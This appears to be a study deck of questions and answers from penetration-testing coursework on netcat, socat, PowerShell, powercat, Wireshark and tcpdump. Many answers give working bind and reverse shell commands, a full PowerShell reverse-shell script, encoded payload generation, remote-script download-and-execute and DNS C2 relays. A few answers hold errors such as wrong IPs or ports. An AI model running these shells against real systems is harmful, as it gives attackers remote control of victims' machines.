Practical Tools

Question 1

5 often used practical tools.

Answer 1

Netcat, Socat, PowerShell, Wireshark, and Tcpdump.

Question 2

What is netcat?

Answer 2

Netcat, first released in 1995 by Hobbit is one of the “original” network penetration testing tools and is so versatile that it lives up to the author’s designation as a hacker’s “Swiss army knife”. The clearest definition of Netcat is from Hobbit himself: a simple “utility which reads and writes data across network connections, using TCP or UDP protocols.”

Question 3

How to use netcat?

Answer 3

nc

Question 4

What ‘-n’ option do in Netcat?

Answer 4

Skip DNS name resolution.

Question 5

What ‘-v’ option do in Netcat?

Answer 5

Add some verbosity.

Question 6

What netcat arguments are required?

Answer 6

The destination IP address; and the destination port number.

Question 7

How to check with netcat if TCP port 110 (the POP3 mail service) is open on 10.11.0.22.

Answer 7

nc -nv 10.11.0.22 110

Question 8

How to use nc to connect to a POP3 service?

Answer 8

nc -nv 10.11.0.22 110

Question 9

How to set up Netcat to listen for incoming connections on TCP port 4444?

Answer 9

nc -nlvp 4444

Question 10

What ‘-n’ option do in netcat?

Answer 10

Disable DNS name resolution.

Question 11

What ‘-l’ option do in netcat?

Answer 11

Create a listener.

Question 12

What ‘-v’ option do in netcat?

Answer 12

Add some verbosity.

Question 13

What ‘-p’ option do in netcat?

Answer 13

Specify the listening port number.

Question 14

How to set up a listener using netcat on port 4444?

Answer 14

nc -nlvp 4444

Question 15

How to connect to a listener using netcat on port 4444 and local address?

Answer 15

nc -nv 127.0.0.1 4444

Question 16

What is dd in netcat?

Answer 16

Disk copying utility.

Question 17

What is dd in netcat?

Answer 17

Disk copying utility.

Question 18

How to use netcat, to receive a file “incoming.exe” on port 4444?

Answer 18

nc -nlvp 4444 > incoming.exe

Question 19

How to use netcat to transfer a “wget.exe” file in “/usr/share/windows-resources/binaries” to another computer which is listening on port 4444 and have IP 10.11.0.22?

Answer 19

nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe

Question 20

What ‘-e’ option do in netcat?

Answer 20

Executes a program after making or receiving a successful connection.

Question 21

How to check ip on windows?

Answer 21

ipconfig

Question 22

How to use netcat to set up a bind shell on port 4444, which give remote access to command prompt?

Answer 22

nc -nlvp 4444 -e cmd.exe

Question 23

How to use netcat to connect to a bind shell on port 4444 and IP 10.11.0.22?

Answer 23

nc -nv 10.11.0.22 4444

Question 24

How to use nc to set up a listener in order to receive a reverse shell on port 4444?

Answer 24

nc -nlvp 4444

Question 25

How to use netcat to send a reverse shell to IP 10.11.0.22 on port 4444?

Answer 25

nc -nv 10.11.0.22 4444 -e /bin/bash

Question 26

How to reverse shell from Kali to Windows on port 4444, also IP on Windows Machine is 192.168.1.111?

Answer 26

Windows: ncat -nlvp 4444 -e cmd.exe
Linux: nc -nv 192.168.1.111 4444

Question 27

Reverse shell from Windows to Kali on port 4444, Kali IP address is 172.20.176.78.

Answer 27

Linux: nc -nvlp 4444
Windows: ncat -nv 172.20.176.78 4444 cmd.exe

Question 28

Bind shell on Kali. Use your Windows system to connect to it. Windows IP 192.168.1.111, Port 4444

Answer 28

Windows: ncat -nlvp 4444|
Linux: nc 192.168.1.111 4444 -e /bin/bash

Question 29

Bind shell on Windows. Use your Kali machine to connect to it.

Answer 29

Linux: nc -lvp 4444
Windows: ncat 192.168.17.129 4444 -e cmd.exe

Question 30

How to transfer a file from your Kali machine to Windows? On port 4444, from the path “/usr/share/windows-resources/binaries/wget.exe” and save it as “incoming.exe”. Windows IP address is 192.168.1.111.

Answer 30

Windows: ncat -nlvp 4444 > incoming.exe
Linux: nc -nv 192.168.1.111 4444 < /usr/share/windows-resources/binaries/wget.exe

Question 31

How to transfer a file from Windows to Linux? On port 4444, send file “incoming.exe” and save it as “come.exe” on Linux Machine, which IP is 192.168.17.129.

Answer 31

Linux: nc -nlvp 4444 > come.exe
Windows: ncat -nv 192.168.17.129 4444 -e incoming.exe

Question 32

What is socat?

Answer 32

Socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. For penetration testing, it is similar to Netcat but has additional useful features.

Question 33

How to use socat to connect to IP 10.11.1.5 at port 80?

Answer 33

socat - TCP4:10.11.1.5:80

Question 34

How to create listener on port 443 using socat?

Answer 34

sudo socat TCP4-LISTEN:443 STDOUT

Question 35

How to use socat to transfer a file names “secret_passwords.txt” on port 443?

Answer 35

sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

Question 36

What does “fork” option do in socat?

Answer 36

Fork creates a child process once a connection is made to the listener, which allows multiple connections.

Question 37

What does “file:” option do in socat?

Answer 37

“file:” specifies the name of a file to be transferred.

Question 38

What “TCP4” option means in socat?

Answer 38

The TCP4 option specifies IPv4.

Question 39

What does “file:” in socat specifies?

Answer 39

The local file name to save the file to.

Question 40

What does “create” specifies in socat?

Answer 40

That a new file will be created.

Question 41

How to create a file by echo? Named “secret_passwords.txt” and contains “123456” string.

Answer 41

echo “123456” > “secret_passwords.txt”

Question 42

How to send file “secret_passwords.txt” from Kali to Windows through socat on port 443 and save it as “received_secret_paswords.txt”? Linux IP is 172.20.176.78.

Answer 42

Linux: sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt
Windows: socat TCP4:127.20.176.78:443 file:received_secret_passwords.txt,create

Question 43

How to open secret_passwords.txt file on Windows?

Answer 43

type secret_passwords.txt

Question 44

What “-d -d” option do in socat?

Answer 44

Increase verbosity (showing fatal, error, warning, and notice messages).

Question 45

What does “EXEC” option in socat?

Answer 45

Execute the given program once a remote connection is established.

Question 46

How to use socat to send a reverse shell on IP address 10.11.0.22, on port 443?

Answer 46

socat TCP4:10.11.0.22:443 EXEC:/bin/bash

Question 47

How to use socat to create a listener on port 443, with increased verbosity and with getting standard output?

Answer 47

socat -d -d TCP4-LISTEN:443 STDOUT

Question 48

What “req” does in “openssl”?

Answer 48

req: initiate a new certificate signing request

Question 49

What “-newkey” does in “openssl”?

Answer 49

generate a new private key

Question 50

What “rsa:2048” does in “openssl”?

Answer 50

rsa:2048: use RSA encryption with a 2,048-bit key length.

Question 51

What “-nodes” does in “openssl”?

Answer 51

-nodes: store the private key without passphrase protection

Question 52

What “-keyout” does in “openssl”?

Answer 52

-keyout: save the key to a file

Question 53

What “-x509” does in “openssl”?

Answer 53

-x509: output a self-signed certificate instead of a certificate request

Question 54

What “-days” does in “openssl”?

Answer 54

-days: set validity period in days

Question 55

What “-out” does in “openssl”?

Answer 55

-out: save the certificate to a file

Question 56

What is OpenSSL?

Answer 56

OpenSSL is a cryptography toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer
Security (TLS v1) network protocols and related cryptography standards required by them.

   The openssl program is a command line tool for using the various cryptography functions of OpenSSL's crypto
   library from the shell.  It can be used for

Question 57

How to use socat to create an encrypted bin shell on port 443?

Answer 57

sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

Question 58

How to transfer file called ‘powercat.ps1’ from Linux machine to Windows system using socat? Path to powercat.ps1 is /usr/share/powershell-empire/empire/server/data/module_source/management/. Linux IP address is 192.168.17.129. Send it through port 443.

Answer 58

Linux: sudo socat TCP4-LISTEN:443,fork file:/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1
Windows: socat TCP4:192.168.17.129:443 file:powercat.ps1,create

Question 59

PowerShell

Answer 59

Windows PowerShell is a task-based command line shell and scripting language. It is designed specifically for system administrators and power-users to rapidly automate the administration of multiple operating systems (Linux, macOS, Unix, and Windows) and the processes related to the applications that run on them.

Question 60

Windows Powershell 5.0 on which OS?

Answer 60

Windows Server 2016, installed by default
Windows Server 2012 R2/Windows Server 2012/Windows Server 2008 R2 with Service Pack
1/Windows 8.1/Windows 7 with Service Pack 1 (install Windows Management Framework
5.0 to run it)

Question 61

Windows Powershell 4.0 on which OS?

Answer 61

• Windows 8.1/Windows Server 2012 R2, installed by default
• Windows 7 with Service Pack 1/Windows Server 2008 R2 with Service Pack 1 (install Windows Management Framework 4.0 to run it)

Question 62

Windows PowerShell 3.0 on which OS?

Answer 62

• Windows 8/Windows Server 2012, installed by default
• Windows 7 with Service Pack 1/Windows Server 2008 R2 with Service Pack 1/2 (install Windows Management Framework 3.0 to run it)

Question 63

How to set an “Unrestricted” execution policy on our Windows client machine in PowerShell?

Answer 63

Set-ExecutionPolicy Unrestricted

Question 64

How to use PowerShell to download a file “wget.exe” from Linux Machine (ip: 10.11.0.4) which started apache2, and save the file on Desktop?

Answer 64

powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.11.0.4/wget.exe’,’C:\Users\offsec\Desktop\wget.exe’)”

Question 65

What does ‘-c’ option does in PowerShell prompt?

Answer 65

This will execute the supplied command (wrapped in double-quotes) as if it were typed at the PowerShell prompt.

Question 66

How to host wget.exe on Kali machine by Apache Service?

Answer 66

sudo cp /usr/share/windows-resources/binaries/wget.exe /var/www/html
sudo systemctl start apache2

Question 67

PowerShell reverse shell for IP address 10.11.0.4, port 443.

Answer 67

$client = New-Object System.Net.Sockets.TCPClient(‘10.11.0.4’,443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
}
$client.Close();

Question 68

How to use PowerShell to send a reverse shell?

Answer 68

powershell -c “$client = New-Object System.Net.Sockets.TCPClient(‘10.11.0.4’,443);

$stream = $client.GetStream();

[byte[]]$bytes = 0..65535|%{0};

while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out- String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}

$client.Close()”

Question 69

What does it do?

powershell -c “$client = New-Object System.Net.Sockets.TCPClient(‘10.11.0.4’,443);

Answer 69

Assign IP address and Port

Question 70

What does it do? $stream = $client.GetStream();

Answer 70

Gets the network stream class.

Question 71

What does it do? [byte[]]$bytes = 0..65535|%{0};

Answer 71

It’s used as a buffer

Question 72

What does it do? while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)

Answer 72

It’s a while loop reading the data to/from network stream.

Question 73

What does it do? $client.Close()”

Answer 73

Close the client connection.

Question 74

What is IEX?

Answer 74

Invoke-Expression

Question 75

How to use nc to receive a reverse shell? Port 443

Answer 75

sudo nc -lnvp 443

Question 76

How to use PowerShell to set up a bind shell?

Answer 76

powershell -c “
$listener = New-Object System.Net.Sockets.TcpListener(‘0.0.0.0’,443);

$listener.start();$client =
$listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes =
0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data =
(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback =
(iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘>
‘;$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Leng
th);$stream.Flush()};$client.Close();$listener.Stop()”

Question 77

How to use netcat to connect to a bind shell created using PowerShell? IP address of machine is 10.11.0.22 and port is 443.

Answer 77

nc -nv 10.11.0.22 443

Question 78

What $listener = New-Object System.Net.Sockets.TcpListener(‘0.0.0.0’,443); does?

Answer 78

Listener variable using System.Net.Sockets.TcpListener class, this class requires 2 arguments, the listening address and port. (‘0.0.0.0’,443)

Question 79

What is Powercat?

Answer 79

Powercat is essentially the PowerShell version of Netcat written by besimorhino. It is a script we can download to a Windows host to leverage the strengths of PowerShell and simplify the creation of bind/reverse shells. Powercat can be installed in Kali with apt install powercat, which will place the script in /usr/share/windows-resources/powercat.

Question 80

How to install powercat on Linux?

Answer 80

apt install powercat

Question 81

If you would install powercat with apt, where it will be placed?

Answer 81

/usr/share/windows-resources/powercat

Question 82

Who created powercat?

Answer 82

Besimorhino

Question 83

How to load a local PowerShell script using dot sourcing?

Answer 83

PS C:\Users\Offsec> . .\powercat.ps1

Question 84

How to load a remote PowerShell script using iex? WWW address is https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1.

Answer 84

PS C:\Users\Offsec> iex (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1’)

Question 85

How to execute the powercat function directly in PowerShell?

Answer 85

PS C:\Users\offsec> powercat

Question 86

How to print The Powercat help menu?

Answer 86

PS C:\Users\offsec> powercat -h

Question 87

How to use netcat to set up a listener for powercat file transfer?

Answer 87

sudo nc -lnvp 443 > receiving_powercat.ps1

Question 88

What ‘-c’ option specifies in powercat?

Answer 88

Client mode, and sends the listening IP address.

Question 89

What ‘-p’ option specifies in powercat?

Answer 89

Specifies the port number to conenct to.

Question 90

What ‘-i’ option specifies in powercat?

Answer 90

Indicates the local file that will be transferred remotely.

Question 91

How to use Powercat to send a file C:\Users\Offsec\powercat.ps1? We want to send it to machine with IP address 10.11.0.4 by port 443.

Answer 91

PS C:\Users\Offsec> powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1

Question 92

How to use netcat to set up a listener in order to receive a reverse shell from powercat?

Answer 92

kali@kali:~$ sudo nc -lvp 443

Question 93

How to use powercat in order to send a reverse shell?

Answer 93

PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe

Question 94

What ‘-e’ option specifies in this command ‘powercat -c 10.11.0.4 -p 443 -e cmd.exe’?

Answer 94

Application to execute (cmd.exe) once a connection is made to a listening port.

Question 95

How to use powercat to set up a bind shell?

Answer 95

PS C:\Users\offsec> powercat -l -p 443 -e cmd.exe

Question 96

What ‘-l’ option in powercat do?

Answer 96

Create listener.

Question 97

What ‘-p’ option in powercat do?

Answer 97

Specify the listening port number.

Question 98

What ‘-e’ option in powercat do?

Answer 98

Application (cmd.exe) executed once connected

Question 99

How to use netcat to connect to a bind shell created by powercat?

Answer 99

kali@kali:~$ nc 10.11.0.22 443

Question 100

What is a payload?

Answer 100

Payload is a set of powershell instructions as well as the portion of the powercat script itself that only includes the features requested by the user.

Question 101

How to create and execute a stand-alone payload?

Answer 101

PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1
PS C:\Users\offsec> ./reverseshell.ps1

Question 102

How to create an encoded stand-alone payload with powercat?

Answer 102

PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1

Question 103

What ‘-E’ option means in PowerShell?

Answer 103

EncodedCommand

Question 104

How to execute an encoded stand-alone payload using PowerShell?

Answer 104

PS C:\Users\offsec> powershell.exe -EZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgAKACAAIAAgACAAcABAHIAYQBtACgAJABGAHUAbgBjAFMAZQB0AHUAcABWAGEAcgBzACkACgAgACAAIAAgACQAYwAsACQAbAAsACQAcAAsACQAdAAgAD0AIAAkAEYAdQBuAGMAUwBlAHQAdQBwAFYAYQByAHMACgAgACAAIAAgAGkAZgAoACQAZwBsAG8YgBhAGwAOgBWAGUAcgBiAG8AcwBlACkAewAkAFYAZQByAGIAbwBzAGUAIAA9ACAAJABUAHIAdQBlAH0ACgAgACAA
IAAgACQARgB1AG4AYwBWAGEAcgBzACAAPQAgAEAAewB9AAoAIAAgACAAIABpAGYAKAAhACQAbAApAAoAIAAgAC
AAIAB7AAoAIAAgACAAIAAgACAAJABGAHUAbgBjAFYAYQByAHMAWwAiAGwAIgBdACAAPQAgACQARgBhAGwAcwBl
AAoAIAAgACAAIAAgACAAJABTAG8AYwBrAGUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdA
BlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAGMAcABDAGwAaQBlAG4AdAAKACAAIAAgACA

Question 105

How to receive a stand-alone reverse shell?

Answer 105

kali@kali:~$ sudo nc -lnvp 443

Question 106

Make reverse shell to connect to Windows from Linux machine and obtain cmd.exe. Port 9000, IP address 172.19.253.220.

Answer 106

kacper@hopper:$ nc -nvlp 9000

C:\Users>ncat -nv 172.19.253.220 9000 -e cmd.exe

Question 107

What is powercat?

Answer 107

Netcat: The powershell version.

Question 108

Basic Connections in powercat?

Answer 108

Basic Client
Basic Listener
Basic Client, Output as Bytes

Question 109

Basic Client command in powercat?

Answer 109

powercat -c 10.1.1.1 -p 443

Question 110

Basic Listener command in powercat?

Answer 110

powercat -l -p 8000

Question 111

Basic Client, Output as Bytes command in powercat?

Answer 111

powercat -c 10.1.1.1 -p 443 -o Bytes

Question 112

Types of File Transfer in netcat?

Answer 112

Send File

Receive File

Question 113

How to send file by powercat?

Answer 113

powercat -c 10.1.1.1 -p 443 -i C:\inputfile

Question 114

How to receive file by Powercat?

Answer 114

powercat -l -p 8000 -of C:\inputfile

Question 115

What can I do with shells by powercat?

Answer 115

Serve CMD Shell
Send CMD Shell
Serve a shell which executes powershell commands

Question 116

How to serve a CMD Shell?

Answer 116

powercat -l -p 443 -e cmd

Question 117

How to send a CMD Shell?

Answer 117

powercat -c 10.1.1.1 -p 443 -e cmd

Question 118

How to serve a shell that executes PowerShell commands?

Answer 118

powercat -l -p 443 -ep

Question 119

Powercat DNS and UDP functionalities

Answer 119

Send Data Over UDP
Connect to the c2.example.com dnscat2 server using the DNS server on 10.1.1.1
Send a shell to the c2.example.com dnscat2 server using the default DNS server in Windows

Question 120

Send Data Over UDP

Answer 120

powercat -c 10.1.1.1 -p 8000 -u

powercat -l -p 8000 -u

Question 121

Connect to the c2.example.com dnscat2 server using the DNS server on 10.1.1.1

Answer 121

powercat -c 10.1.1.1 -p 53 -dns c2.example.com

Question 122

Send a shell to the c2.example.com dnscat2 server using the default DNS server in Windows

Answer 122

powercat -dns c2.example.com -e cmd

Question 123

How Relays in netcat works?

Answer 123

Just like traditional netcat relays, but you don’t have to create a file or start a second process. You can also relay data between connections of different protocols.

Question 124

Type of Relays in netcat

Answer 124

TCP Listener to TCP Client Relay
TCP Listener to UDP Client Relay
TCP Listener to DNS Client Relay
TCP Listener to DNS Client Relay using the Windows Default DNS Server
TCP Client to Client Relay
TCP Listener to Listener Relay

Question 125

TCP Listener to TCP Client Relay

Answer 125

powercat -l -p 8000 -r tcp:10.1.1.16:443

Question 126

TCP Listener to UDP Client Relay

Answer 126

powercat -l -p 8000 -r udp:10.1.1.16:53

Question 127

TCP Listener to DNS Client Relay

Answer 127

powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com

Question 128

TCP Listener to DNS Client Relay using the Windows Default DNS Server

Answer 128

powercat -l -p 8000 -r dns:::c2.example.com

Question 129

TCP Client to Client Relay

Answer 129

powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443

Question 130

TCP Listener to Listener Relay

Answer 130

powercat -l -p 8000 -r tcp:9000

Question 131

TCP Listener to Listener Relay

Answer 131

powercat -l -p 8000 -r tcp:9000

Question 132

Generate Payloads types

Answer 132

Generate a reverse tcp payload which connects back to 10.1.1.15 port 443
Generate a bind tcp encoded command which listens on port 8000

Question 133

How to generate a reverse tcp payload which connects back to 10.1.1.15 port 443 using powercat?

Answer 133

powercat -c 10.1.1.15 -p 443 -e cmd -g

Question 134

How to generate a bind tcp encoded command which listens on port 8000 using powercat?

Answer 134

powercat -l -p 8000 -e cmd -ge

Question 135

How to perform Basic TCP Port Scanner using powercat?

Answer 135

(21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1 -Verbose -d}

Question 136

How to Start A Persistent Server That Serves a File using powercat?

Answer 136

powercat -l -p 443 -i C:\inputfile -rep

Question 137

How to set up listener on Linux on port 443?

Answer 137

sudo nc -lnvp 443

Question 138

How to send files by powercat to Linux? You want to transfer file “powercat.ps1” which path is “C:\Users\boncz”, on your Linux machine you want to get it through port 443, save as “receiving_powercat.ps1”, and your IP address is 172.19.253.220.

Answer 138

kacper@hopper:~/powercat$ sudo nc -lnvp 443 > receiving_powercat.ps1
PS C:\Users\boncz> powercat -c 172.19.253.220 -p 443 -i C:\Users\boncz\powercat.ps1

Question 139

PowerShell Reverse Shell important steps.

Answer 139

Get Powercat through Linux probably.
Dotsource Powercat.ps1.
IEX Powercat
Listen on Linux, then execute Reverse Shell on Windows PS with ‘-c’ option.

Question 140

How to create Bind Shell by Powercat?

Answer 140

PS C:\Users\boncz> powercat -l -p 443 -e cmd.exe

kacper@hopper:$ nc -nv 192.168.1.111 443

Question 141

How to set listening with powercat on port 443, with executable cmd.exe, and connect with another powercat to the cmd.exe? Destination IP is 192.168.1.111 and Destination Port is 443.

Answer 141

PS C:\Users\boncz> powercat -l -p 443 -e cmd.exe

PS C:\Users\boncz> powercat -c 192.168.1.111 443

Question 142

How to create ps script which is stand-alone payload in powercat? Destination IP is 172.19.253.220 and port is 443. You want to execute cmd.exe.

Answer 142

Linux: sudo nc -nlvp 44
PS: powercat -c 172.19.253.220 -p 443 -e cmd.exe -g > reverseshell.ps1
PS: ./reverseshell.ps1

Question 143

How to create encoded reverse shell by powercat? Destination IP is 172.19.253.220, the destination port is 443, you want to execute cmd.exe on payload, and save file as “encodedreverseshell.ps1”.

Answer 143

PS C:\Users\boncz> powercat -c 172.19.253.220 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1

Question 144

How to execute encrypted payload in powershell?

Answer 144

PS C:> powershell.exe -E

kacper@hopper:/mnt/c/WINDOWS/system32$ sudo nc -nlvp 443

Question 145

What is Wireshark?

Answer 145

Wireshark, is a must-have tool for learning network protocols, analyzing network traffic, and debugging network services.

Question 146

Which libraries Wireshark uses on Linux?

Answer 146

Libpcap

Question 147

Which libraries Wireshark uses on Windows?

Answer 147

Winpcap

Question 148

What capture filters do in Wireshark?

Answer 148

If we apply capture filters during a Wireshark session, any packets that do not match the filter criteria will be dropped and the remaining data is passed on to the capture engine.

Question 149

What capture engine do in Wireshark?

Answer 149

Dissects the incoming packets, analyzes them, and finally applies any additional display filters before displaying the output.

Question 150

Order from the Wire to Wireshark.

Answer 150

Network -> Capture Filters -> Capture Engine -> Display Filters

Question 151

How to run Wireshark from terminal?

Answer 151

kali@kali:~$ sudo wireshark

Question 152

Why do we use Capture Filters in Wireshark?

Answer 152

To reduce the amount of captured traffic by discarding any traffic that does not match our filter and narrow our focus to the packets we wish to analyze.

Question 153

How to use net filter, to capture only traffic on the 10.11.1.0/24 address range?

Answer 153

net 10.11.1.0/24

Question 154

How to connect ftp on ip 10.11.1.13?

Answer 154

kacper@hopper:/mnt/c/WINDOWS/system32$ ftp 10.11.1.13

Question 155

How can you capture network traffic exactly for FTP connection estabilished on 10.11.1.13? What is capture and display filter for this?

Answer 155

Capture Filter: net 10.11.1.0/24

Display Filter: tcp.port == 21

Question 156

How to set a display filter for all traffic on port 21?

Answer 156

tcp.port == 21

Question 157

How to follow a TCP stream in Wireshark?

Answer 157

RMB -> Follow -> TCP Stream

Question 158

How to use display filter to only monitor traffic on port 110?

Answer 158

tcp.port == 110

Question 159

What Exactly Is Port Filtering?

Answer 159

Port filtering represents a way of filtering packets (messages from different network protocols) based on their port number. These port numbers are used for TCP and UDP protocols, the best-known protocols for transmission. Port filtering represents a form of protection for your computer since, by port filtering, you can choose to allow or block certain ports to prevent different operations within the network.

Question 160

How to capture only traffic to or from IP address 172.18.5.4?

Answer 160

host 172.18.5.4

Question 161

How to capture traffic to or from a range of IP addresses? 192.168.x.x

Answer 161

net 192.168.0.0/24
or
net 192.168.0.0 mask 255.255.255.0

Question 162

How to capture traffic from a range of IP addresses using Wireshark CaptureFilters?

Answer 162

src net 192.168.0.0/24
or
src net 192.168.0.0 mask 255.255.255.0

Question 163

How to capture traffic to a range of IP addresses using CaptureFilters in Wireshark?

Answer 163

dst net 192.168.0.0/24
or
dst net 192.168.0.0 mask 255.255.255.0

Question 164

How to capture only DNS (port 53) traffic using CaptureFilters in Wireshark?

Answer 164

port 53

Question 165

DNS port

Answer 165

53

Question 166

How to capture non-HTTP and non-SMTP traffic on your server? Let’s say your domain is www.example.com.

Answer 166

host www.example.com and not (port 80 or port 25)
or
host www.example.com and not port 80 and not port 25

Question 167

How to capture except all ARP and DNS traffic using CaptureFilters in Wireshark?

Answer 167

port not 53 and not arp

Question 168

How to capture traffic within a range of ports using CaptureFilters in Wireshark?

Answer 168

(tcp[0:2] > 1500 and tcp[0:2] < 1550) or (tcp[2:2] > 1500 and tcp[2:2] < 1550)

or, with newer versions of libpcap (0.9.1 and later):
tcp portrange 1501-1549

Question 169

What is libpcap library for?

Answer 169

Wireshark/TShark uses libpcap to capture live network data.

Question 170

How to capture only Ethernet type EAPOL using CaptureFilters in Wireshark?

Answer 170

ether proto 0x888e

Question 171

How to reject ethernet frames towards the Link Layer Discovery Protocol Multicast group using CaptureFilters using Wireshark?

Answer 171

not ether dst 01:80:c2:00:00:0e

Question 172

How to capture only IPv4 traffic - the shortest filter, but sometimes very useful to get rid of lower layer protocols like ARP and STP using CaptureFilters in Wireshark?

Answer 172

ip

Question 173

How to capture only unicast traffic - useful to get rid of noise on the network if you only want to see traffic to and from your machine, not, for example, broadcast and multicast announcements using CaptureFilters in Wireshark?

Answer 173

not broadcast and not multicast

Question 174

How to capture IPv6 “all nodes” (router and neighbor advertisement) traffic using CaptureFilters in Wireshark?

Answer 174

dst host ff02::1

Question 175

How to capture HTTP GET requests. This looks for the bytes ‘G’, ‘E’, ‘T’, and ‘ ‘ (hex values 47, 45, 54, and 20) just after the TCP header. “tcp[12:1] & 0xf0)&raquo_space; 2” figures out the TCP header length using CaptureFilters in Wireshark?

Answer 175

port 80 and tcp[((tcp[12:1] & 0xf0)&raquo_space; 2):4] = 0x47455420

Question 176

Use the capture filter to only collect traffic on port 110.

Answer 176

tcp port 110

Question 177

What is tcpdump?

Answer 177

Tcpdump is a text-based network sniffer that is streamlined, powerful, and flexible despite the lack of a graphical interface. It is by far the most commonly-used command-line packet analyzer and can be found on most Unix and Linux operating systems, but local user permissions determine the ability to capture network traffic.

Question 178

How to use tcpdump to read packet capture named “password_cracking_filtered.pcap”?

Answer 178

kali@kali:~$ sudo tcpdump -r password_cracking_filtered.pcap

Question 179

What ‘-n’ option do in tcpdump?

Answer 179

Skip DNS name lookups.

Question 180

What ‘-r’ option do in tcpdump?

Answer 180

Read from packet capture file.

Question 181

What ‘sort | uniq -c’ do?

Answer 181

Sort and count the number of times the field appears.

Question 182

What ‘head’ do?

Answer 182

Display the first 10 lines of the output.

Question 183

How to use tcpdump to read and filter the packet capture? We want to skip DNS name lookups, read from our packet capture filter named “password_cracking_filtered.pcap”. Print the destination IP address and port, sort and count the numbers of times the field appears in the capture, respectively, and display only the first 10 lines of the output.

Answer 183

sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F” “ ‘{print $5}’ | sort | uniq -c | head.

Question 184

What is src host in tcpdump?

Answer 184

Source host

Question 185

What is dst host in tcpdump?

Answer 185

Destination host

Question 186

How to filter by port number (81) using tcpdump?

Answer 186

-n port 81

Question 187

How to filter source host 172.16.40.10 in file “password_cracking_filtered.pcap” using tcpdump?

Answer 187

sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap

Question 188

How to filter destination host 172.16.40.10 in file “password_cracking_filtered.pcap” using tcpdump?

Answer 188

sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap

Question 189

How to filter by port number both source and destination traffic against port 81 in file “password_cracking_filtered.pcap”?

Answer 189

sudo tcpdump -n port 81 -r password_cracking_filtered.pcap

Question 190

What ‘-X’ option do in tcpdump?

Answer 190

Prints the packet data in both HEX and ASCII format.

Question 191

How to use tcpdump to read the packet capture in hex/ascii output from file “password_cracking_filtered.pcap”?

Answer 191

sudo tcpdump -nX -r password_cracking_filtered.pcap

Question 192

How to convert the binary bits (00011000) to decimal in bash?

Answer 192

kali@kali:~$ echo “$((2#00011000))”

Question 193

How to use tcpdump to recreate the Wireshark exercise of capturing traffic on port 110.

Answer 193

sudo tcpdump port 80

Question 194

How to use the -X flag to view the content of the packet. If data is truncated, investigate how the -s flag might help.

Question 194

What ‘-X’ option do in tcpdump?

Answer 194

-x When parsing and printing, in addition to printing the headers of each packet, print the data of each
packet (minus its link level header) in hex. The smaller of the entire packet or snaplen bytes will be
printed. Note that this is the entire link-layer packet, so for link layers that pad (e.g. Ethernet),
the padding bytes will also be printed when the higher layer packet is shorter than the required pad‐
ding.

Question 195

What ‘-s’ option do in tcpdump?

Answer 195

-s snaplen
–snapshot-length=snaplen
Snarf snaplen bytes of data from each packet rather than the default of 262144 bytes. Packets trun‐
cated because of a limited snapshot are indicated in the output with ``[|proto]’’, where proto is the
name of the protocol level at which the truncation has occurred. Note that taking larger snapshots
both increases the amount of time it takes to process packets and, effectively, decreases the amount of
packet buffering. This may cause packets to be lost. You should limit snaplen to the smallest number
that will capture the protocol information you’re interested in. Setting snaplen to 0 sets it to the
default of 262144, for backwards compatibility with recent older versions of tcpdump.

Question 196

Wrapping up, what’s practical tools you learned here?

Answer 196

Netcat, socat, tcpdump, wireshark, powershell